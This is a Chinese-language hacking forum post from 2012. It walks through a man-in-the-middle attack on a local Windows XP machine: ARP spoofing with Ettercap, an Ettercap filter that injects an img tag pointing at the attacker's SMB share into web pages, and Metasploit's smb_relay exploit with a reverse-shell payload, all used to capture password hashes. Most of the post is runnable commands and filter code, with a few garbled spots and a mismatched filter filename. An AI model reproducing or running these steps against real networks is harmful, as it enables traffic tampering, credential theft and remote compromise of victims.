利用Ettercap攻击目标服务器抓HASH

[复制链接]
查看340 | 回复0 | 2012-4-1 19:22:47 | 显示全部楼层 |阅读模式
前言


昨天看到Mickey牛的那篇HaveFunWithEttercapFilterInLAN.pdf文档。于是今天就去机房试验了一下。遂记下实验记录,有兴趣的童鞋可以参考Mickey的文档http://wenku.baidu.com/view/4df554fafab069dc5022019e.html




#主要是利用ettercapARP嗅探和metasploit/windows/smb/smb_relay这个exp
环境。内网啦一个交换机下mycomputer#Backtrack4IP192.168.0.45
#targetwin_xpIP192.168.0.99


1.我们首先配置metaspliot



./m单机传奇console//启动metasoloitBacktrack4默认是root权限



useexploit/windows/smb/smb_relay//使用smb_relayexp



setPAYLOADwindows/shell_reverse_tcp//设置payload模块反弹回来用的东东
setSVRHOST192.168.0.45//设置本机IP
setSVPORT53//设置本机端口
exploit//开始利用




2.需要一份Ettercap的Filter过滤脚本直接COPYMickey牛文档里面的做一个修改
[pre]if&nbsp;(ip.proto&nbsp;==&nbsp;TCP&nbsp;&&&nbsp;tcp.dst&nbsp;==&nbsp;80)&nbsp;{&nbsp;&nbsp;if&nbsp;(search(DATA.data,&quot;Accept-Encoding&quot;))&nbsp;{&nbsp;&nbsp;replace(&quot;Accept-Encoding&quot;,&quot;Accept-Mousecat&quot;);&nbsp;&nbsp;msg(&quot;zapped&nbsp;Accept-Encoding!\n&quot;);&nbsp;&nbsp;}&nbsp;&nbsp;}&nbsp;&nbsp;if&nbsp;(ip.proto&nbsp;==&nbsp;TCP&nbsp;&&&nbsp;tcp.src&nbsp;==&nbsp;80)&nbsp;{&nbsp;&nbsp;replace(&quot;</body>&quot;,&quot;<img&nbsp;src=\&quot;\\\\192.168.0.45\\fvck.jpg\&quot;>&nbsp;</body>&quot;&nbsp;&quot;);&nbsp;&nbsp;replace(&quot;</Body>&quot;,&quot;<img&nbsp;src=\&quot;\\\\192.168.0.45\\fvck.jpg\&quot;>&nbsp;</body>&quot;&nbsp;&quot;);&nbsp;&nbsp;msg(&quot;Filter&nbsp;Ran.\n&quot;);&nbsp;&nbsp;}&nbsp;&nbsp;[/pre]
复制代码这段代码。
我们也只需要修改IP就OK拉。然后把这段代码保存一个你觉得nb的名字好了我这里保存为net.filter
&nbsp;
3编译一下这个net.filtet
命令:etterfilternet.filter-onet.ef//不要忘记后缀哦
然后我们得到了net.filternet.ef2个文件啦!
&nbsp;
4开始邪恶吧
攻击某个IP就直接这样可以了ettercap-T-q-Fsmbrelay.ef-MARP/192.168.0.99///
各参数意义如下:
-T:使用TEXT模式启动
-q:启用安静模式
-F:加载指定的filter
-M:指定使用ARP模块
当你的目标浏览网页的时候metasploit就应该有反应哦!不过mickey牛说的可以反弹回来cmdshell。我一直没成功不过在ettercap里面倒是看到了目标机器的hash。所以这样或许可以来弄hash。。C段的时候
不知道这个方式可行不!
笔记本没电了。该睡觉了。Mickey牛的文档后面还有个东东没说。大家看看那份文档吧。。Goodnight

&nbsp;
&nbsp;
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则